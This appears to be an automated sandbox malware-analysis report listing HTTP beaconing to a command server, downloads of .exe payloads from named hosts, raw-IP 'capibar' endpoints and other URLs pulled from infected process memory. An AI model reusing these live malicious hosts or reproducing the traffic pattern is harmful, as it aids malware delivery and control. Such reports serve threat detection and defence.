                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gtapfy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xokmpq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nbjhuloh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cifusjcgu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 257Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jfioua.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://usyqjbp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/8474_1641976243_3082.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lepql.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://txdwk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://phiqqvf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tmtuscxant.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jpiimxqwms.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lsmlx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://etxdwvf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 257Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lnxul.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://krijk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 325Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://brqduyej.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://imxgr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://koqghysihf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 179Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kiocvqo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 369Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /7.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kcgghyab.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://smrwgxji.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: host-data-coin-11.com
Source: global traffic | TCP traffic: 192.168.2.6:49716 -> 185.7.214.171:8080
Source: global traffic | TCP traffic: 192.168.2.6:49764 -> 86.107.197.138:38133
Source: unknown | Network traffic detected: IP country count 10
Source: global traffic | TCP traffic: 192.168.2.6:49726 -> 40.93.207.0:25
Source: A7F0.exe, 0000001F.00000002.650660654.0000000002FEE000.00000004.00000020.sdmp | String found in binary or memory: http://178.62.113.205/capibar
Source: A7F0.exe, 0000001F.00000002.650660654.0000000002FEE000.00000004.00000020.sdmp | String found in binary or memory: http://185.163.204.22/capibar
Source: A7F0.exe, 0000001F.00000002.663447293.00000000051C0000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000002.663539364.00000000051D4000.00000004.00000001.sdmp | String found in binary or memory: http://185.163.204.24/
Source: A7F0.exe, 0000001F.00000002.663447293.00000000051C0000.00000004.00000001.sdmp | String found in binary or memory: http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/53d4f78085a60d100b5580840cacffadb56a356d
Source: A7F0.exe, 0000001F.00000002.663447293.00000000051C0000.00000004.00000001.sdmp | String found in binary or memory: http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/74acab80c259fbd3afe9b19dbd62861e1ddfe5b8
Source: A7F0.exe, 0000001F.00000002.663447293.00000000051C0000.00000004.00000001.sdmp | String found in binary or memory: http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/74acab80c259fbd3afe9b19dbd62861e1ddfe5b841
Source: A7F0.exe, 0000001F.00000002.663447293.00000000051C0000.00000004.00000001.sdmp | String found in binary or memory: http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/74acab80c259fbd3afe9b19dbd62861e1ddfe5b8v
Source: A7F0.exe, 0000001F.00000002.663447293.00000000051C0000.00000004.00000001.sdmp | String found in binary or memory: http://185.163.204.24/0
Source: A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmp | String found in binary or memory: http://185.163.204.24/B
Source: A7F0.exe, 0000001F.00000002.663539364.00000000051D4000.00000004.00000001.sdmp | String found in binary or memory: http://185.163.204.24/F
Source: A7F0.exe, 0000001F.00000002.663539364.00000000051D4000.00000004.00000001.sdmp | String found in binary or memory: http://185.163.204.24/a
Source: A7F0.exe, 0000001F.00000002.663539364.00000000051D4000.00000004.00000001.sdmp | String found in binary or memory: http://185.163.204.24/as
Source: A7F0.exe, 0000001F.00000002.663539364.00000000051D4000.00000004.00000001.sdmp | String found in binary or memory: http://185.163.204.24/r
Source: A7F0.exe, 0000001F.00000002.650660654.0000000002FEE000.00000004.00000020.sdmp | String found in binary or memory: http://185.163.45.70/capibar
Source: svchost.exe, 0000001D.00000002.643514399.0000019DDEEAE000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.643865558.0000019DDEEBD000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.645547709.0000019DDF702000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmp | String found in binary or memory: http://Passport.NET/tb
Source: WerFault.exe, 0000000C.00000002.499940204.0000000004F9F000.00000004.00000001.sdmp, svchost.exe, 0000001E.00000002.650780980.0000023247887000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 0000001E.00000002.650780980.0000023247887000.00000004.00000001.sdmp | String found in binary or memory: http://crl.ver)
Source: svchost.exe, 0000001D.00000003.492894441.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492948923.0000019DDF70F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.493224979.0000019DDF70F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492751417.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.493183526.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.645771759.0000019DDF710000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.493137367.0000019DDF710000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492868247.0000019DDF710000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: svchost.exe, 0000001D.00000002.645870080.0000019DDF713000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdsecuri
Source: svchost.exe, 0000001D.00000003.492894441.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492948923.0000019DDF70F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.493224979.0000019DDF70F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492751417.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.493183526.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.645771759.0000019DDF710000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.493137367.0000019DDF710000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492868247.0000019DDF710000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.645547709.0000019DDF702000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmp | String found in binary or memory: http://passport.net/tb
Source: svchost.exe, 0000001E.00000002.645438848.00000232420AA000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enumerate
Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policyt
Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scAM
Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.645547709.0000019DDF702000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.643865558.0000019DDEEBD000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: svchost.exe, 0000001D.00000002.643514399.0000019DDEEAE000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustp
Source: explorer.exe, 00000002.00000000.374781683.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.362338690.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.391269138.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehpy
Source: A7F0.exe, 0000001F.00000002.650660654.0000000002FEE000.00000004.00000020.sdmp | String found in binary or memory: https://185.163.204.22/capibar
Source: A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmp | String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
Source: A7F0.exe, 0000001F.00000002.663949745.0000000005218000.00000004.00000001.sdmp | String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
Source: A7F0.exe, 0000001F.00000002.663949745.0000000005218000.00000004.00000001.sdmp | String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736
Source: svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp | String found in binary or memory: https://account.live.com/InlineSignup.aspx?i
Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp | String found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&amp;id=80502
Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp | String found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491882830.0000019DDF751000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmp | String found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
Source: svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491882830.0000019DDF751000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80600
Source: svchost.exe, 0000001D.00000003.491882830.0000019DDF751000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601
Source: svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603
Source: svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604
Source: svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605
Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
Source: svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600:
Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601y0
Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603xB
Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp | String found in binary or memory: https://account.live.com/msangcwam
Source: 3F71.exe, 0000000D.00000002.509652789.00000000035F1000.00000004.00000001.sdmp, 3F71.exe, 0000001C.00000000.502914721.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://api.ip.sb/ip
Source: A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000002.664193950.000000000522C000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000002.663949745.0000000005218000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=18
Source: A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1ctLMEM
Source: A7F0.exe, 0000001F.00000002.650660654.0000000002FEE000.00000004.00000020.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp | String found in binary or memory: https://logilive.c
Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp | String found in binary or memory: https://login.liUTF-16p
Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp | String found in binary or memory: https://login.liUTF-8/p
Source: svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp | String found in binary or memory: https://login.live
Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.c
Source: svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com
Source: svchost.exe, 0000001D.00000003.492118007.0000019DDF769000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491898564.0000019DDF74F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/ApproveSession.srf
Source: svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80502
Source: svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491882830.0000019DDF751000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80600
Source: svchost.exe, 0000001D.00000003.491882830.0000019DDF751000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80601
Source: svchost.exe, 0000001D.00000003.492138644.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492038129.0000019DDF763000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
Source: svchost.exe, 0000001D.00000003.492138644.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492038129.0000019DDF763000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 0000001D.00000003.492138644.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492038129.0000019DDF763000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/ListSessions.srf
Source: svchost.exe, 0000001D.00000003.492118007.0000019DDF769000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491898564.0000019DDF74F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/ManageApprover.srf
Source: svchost.exe, 0000001D.00000003.492118007.0000019DDF769000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491898564.0000019DDF74F000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/ManageLoginKeys.srf
Source: svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/ManageLoginKeys.srfPtL
Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.645870080.0000019DDF713000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/RST2.srf
Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/didtou.srf
Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/didtou.srfs
Source: svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/getrealminf
Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/getrealminfo.srf
                          Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                          Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492138644.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492038129.0000019DDF763000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492038129.0000019DDF763000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492118007.0000019DDF769000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491898564.0000019DDF74F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492038129.0000019DDF763000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492038129.0000019DDF763000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                          Source: svchost.exe, 0000001D.00000003.492118007.0000019DDF769000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491898564.0000019DDF74F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                          Source: svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cplive.com
                          Source: svchost.exe, 0000001D.00000003.492566066.0000019DDF72E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfsrfsrf060805&fid=cp.live.com
